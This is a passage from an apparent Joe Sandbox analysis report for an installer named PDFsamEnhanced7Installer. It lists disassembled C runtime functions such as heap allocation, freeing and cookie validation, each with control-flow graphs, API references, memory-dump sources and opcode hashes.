                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DispatcherExceptionUser
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 6842923-3924258884
                                                                                                      • Opcode ID: 9526f7e08bd6c16c2342ef8eef238265d413a435df4458f16e453eb9943a038c
                                                                                                      • Instruction ID: d4a3a2da2e1bf479796c59ad225918a908c86af113ba7fb791cf212342d16526
                                                                                                      • Opcode Fuzzy Hash: 9526f7e08bd6c16c2342ef8eef238265d413a435df4458f16e453eb9943a038c
                                                                                                      • Instruction Fuzzy Hash: 2E018F35900209AFD7019F5CD584BAEBFBDFF44714F154159EA44AB391DB70AA01CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0187B8E3, Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(01B21CB0,0000000C), ref: 0187B8F6
                                                                                                      • ExitThread.KERNEL32 ref: 0187B8FD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorExitLastThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611280651-0
                                                                                                      • Opcode ID: cfb469f85adee780257d11a2bdc1af184178e7d59d7d9ea9a3fd7537bd611b40
                                                                                                      • Instruction ID: 7baf03718356f1a4304e7d4cde4db34221ee71e357f76d730881650efb37ae2c
                                                                                                      • Opcode Fuzzy Hash: cfb469f85adee780257d11a2bdc1af184178e7d59d7d9ea9a3fd7537bd611b40
                                                                                                      • Instruction Fuzzy Hash: 96F0FF30A002029FDF11BBB4C54CB2EBBB6EF24300F144449E001D7240DB309A02CBA2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01895999, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 301 1895999-18959a5 302 18959d7-18959e2 call 1879a33 301->302 303 18959a7-18959a9 301->303 310 18959e4-18959e6 302->310 305 18959ab-18959ac 303->305 306 18959c2-18959d3 RtlAllocateHeap 303->306 305->306 307 18959ae-18959b5 call 1892960 306->307 308 18959d5 306->308 307->302 313 18959b7-18959c0 call 1883a74 307->313 308->310 313->302 313->306
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,01899274,00000002,?,01A2DE04), ref: 018959CB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: e089c1b218514375beba02fd759c4ed208e241e8776f1781624b7fceeb3afc51
                                                                                                      • Instruction ID: 9e02e60eb561235f9ff89c5470e2655542878c8de6c8686afb8cafcff011e72b
                                                                                                      • Opcode Fuzzy Hash: e089c1b218514375beba02fd759c4ed208e241e8776f1781624b7fceeb3afc51
                                                                                                      • Instruction Fuzzy Hash: 29E0653160561656FF23276DAC00B6A7A4C9F437B0F1D0123EE88E6585DB50CB0086F2
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0187B174, Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 316 187b174-187b187 call 189595f 318 187b18c-187b18e 316->318
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0187B187
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                      • String ID:
                                                                                                      • API String ID: 1353095263-0
                                                                                                      • Opcode ID: 9e3b06649ea68a8a46df76b7f407484dbdbcea1553bfb3040db3a828de9b73d4
                                                                                                      • Instruction ID: dfc2c38f2cad52283034067d665b23ba9c6d6d2e7d310f4fcca8c2e9fa65fcd8
                                                                                                      • Opcode Fuzzy Hash: 9e3b06649ea68a8a46df76b7f407484dbdbcea1553bfb3040db3a828de9b73d4
                                                                                                      • Instruction Fuzzy Hash: C3C08C71000208BBDF019B45D806A4E7BA8DB81374F200044E80557250CAB1EF009680
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Non-executed Functions

                                                                                                      Function 01894B3C, Relevance: .0, Instructions: 29COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: 85906d68f9382c766aa00e403d72d3473e1ae2011df671951f505d34db857443
                                                                                                      • Instruction ID: 62dafbf560af7260db5f183ad087c4fe4018b9be673809200b7ebdf3e667754d
                                                                                                      • Opcode Fuzzy Hash: 85906d68f9382c766aa00e403d72d3473e1ae2011df671951f505d34db857443
                                                                                                      • Instruction Fuzzy Hash: BBF06532615224DFCF2ADB8CC545B5973ACEB45B55F655096E601DB151C370DF01C7D0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0189EA0B, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 417 189ea0b-189ea1f 418 189ea8d-189ea95 417->418 419 189ea21-189ea26 417->419 421 189eadc-189eaf4 call 189eb7c 418->421 422 189ea97-189ea9a 418->422 419->418 420 189ea28-189ea2d 419->420 420->418 423 189ea2f-189ea32 420->423 431 189eaf7-189eafe 421->431 422->421 425 189ea9c-189ead9 call 189595f * 4 422->425 423->418 426 189ea34-189ea3c 423->426 425->421 429 189ea3e-189ea41 426->429 430 189ea56-189ea5e 426->430 429->430 433 189ea43-189ea55 call 189595f call 189dcf2 429->433 436 189ea78-189ea8c call 189595f * 2 430->436 437 189ea60-189ea63 430->437 434 189eb1d-189eb21 431->434 435 189eb00-189eb04 431->435 433->430 441 189eb39-189eb45 434->441 442 189eb23-189eb28 434->442 445 189eb1a 435->445 446 189eb06-189eb09 435->446 436->418 437->436 439 189ea65-189ea77 call 189595f call 189e1a7 437->439 439->436 441->431 452 189eb47-189eb52 call 189595f 441->452 449 189eb2a-189eb2d 442->449 450 189eb36 442->450 445->434 446->445 454 189eb0b-189eb19 call 189595f * 2 446->454 449->450 457 189eb2f-189eb35 call 189595f 449->457 450->441 454->445 457->450
                                                                                                      APIs
                                                                                                      • ___free_lconv_mon.LIBCMT ref: 0189EA4F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD0F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD21
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD33
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD45
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD57
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD69
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD7B
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD8D
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DD9F
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDB1
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDC3
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDD5
                                                                                                        • Part of subcall function 0189DCF2: _free.LIBCMT ref: 0189DDE7
                                                                                                      • _free.LIBCMT ref: 0189EA44
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189EA66
                                                                                                      • _free.LIBCMT ref: 0189EA7B
                                                                                                      • _free.LIBCMT ref: 0189EA86
                                                                                                      • _free.LIBCMT ref: 0189EAA8
                                                                                                      • _free.LIBCMT ref: 0189EABB
                                                                                                      • _free.LIBCMT ref: 0189EAC9
                                                                                                      • _free.LIBCMT ref: 0189EAD4
                                                                                                      • _free.LIBCMT ref: 0189EB0C
                                                                                                      • _free.LIBCMT ref: 0189EB13
                                                                                                      • _free.LIBCMT ref: 0189EB30
                                                                                                      • _free.LIBCMT ref: 0189EB48
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                      • String ID:
                                                                                                      • API String ID: 161543041-0
                                                                                                      • Opcode ID: a94daa16c7603f93bb276a1c49c0f23fa5ce3ec24c2322bb28136957819803d1
                                                                                                      • Instruction ID: 0a60e3c798fa0ae493c5cac48e4f5031df0833bfcef95076372b207029291c4d
                                                                                                      • Opcode Fuzzy Hash: a94daa16c7603f93bb276a1c49c0f23fa5ce3ec24c2322bb28136957819803d1
                                                                                                      • Instruction Fuzzy Hash: DC316F716003029FFF32EA7CE844B567BE9BF12320F18441AE55AD7161DF74AA518B21
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 01868A70, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 197COMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 474 1868a70-1868ac1 call 18bdd36 call 1868a30 call 186beec 481 1868ac3-1868ad5 474->481 482 1868b1d-1868b20 474->482 484 1868b40-1868b49 481->484 485 1868ad7-1868aee 481->485 483 1868b22-1868b2f call 187202c 482->483 482->484 490 1868b34-1868b3d call 1868a30 483->490 487 1868b04 485->487 488 1868af0-1868afe call 1871fdc 485->488 489 1868b07-1868b0c 487->489 495 1868b14-1868b1b 488->495 496 1868b00 488->496 489->485 492 1868b0e-1868b10 489->492 490->484 492->484 497 1868b12 492->497 495->490 499 1868b02 496->499 500 1868b4a-1868b53 496->500 497->490 499->489 501 1868b55-1868b5c 500->501 502 1868b8d-1868b9d call 1872010 500->502 501->502 503 1868b5e-1868b6d call 18bd6f0 501->503 508 1868bb1-1868bf1 call 1868a30 call 1871ff4 502->508 509 1868b9f-1868bae call 187202c 502->509 511 1868b6f-1868b87 503->511 512 1868b8a 503->512 519 1868c25-1868c35 508->519 520 1868bf3-1868bfb 508->520 509->508 511->512 512->502 524 1868c3a-1868c46 519->524 522 1868c17-1868c19 520->522 523 1868bfd 520->523 526 1868c1d-1868c23 522->526 525 1868bff-1868c06 523->525 527 1868c67-1868c6d 524->527 528 1868c48-1868c61 524->528 525->522 529 1868c08-1868c15 525->529 530 1868c8d-1868c94 526->530 533 1868c6f-1868c72 527->533 534 1868c8b 527->534 531 1868c63-1868c65 528->531 532 1868c7b-1868c85 528->532 529->522 529->525 537 1868c76-1868c79 531->537 532->526 535 1868c87-1868c89 533->535 536 1868c74 533->536 534->530 535->530 536->537 537->524
                                                                                                      APIs
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868AA7
                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 01868AAF
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868B38
                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 01868B63
                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01868BB8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                      • Opcode ID: 63c1630240dff6a6ed3c9a1063e551ac11793facce07836283cce3633efdd1ac
                                                                                                      • Instruction ID: 9bb84ce898a7881e2198839caac4a6e29f98d99cb20af782f43026e0532ebab5
                                                                                                      • Opcode Fuzzy Hash: 63c1630240dff6a6ed3c9a1063e551ac11793facce07836283cce3633efdd1ac
                                                                                                      • Instruction Fuzzy Hash: 35611A74A003199BDF11DF3CC8416AABBE9AF16318F188165ED08EB385E735DB41CB91
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0189E6D3, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0189E41F: _free.LIBCMT ref: 0189E444
                                                                                                      • _free.LIBCMT ref: 0189E721
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189E72C
                                                                                                      • _free.LIBCMT ref: 0189E737
                                                                                                      • _free.LIBCMT ref: 0189E78B
                                                                                                      • _free.LIBCMT ref: 0189E796
                                                                                                      • _free.LIBCMT ref: 0189E7A1
                                                                                                      • _free.LIBCMT ref: 0189E7AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
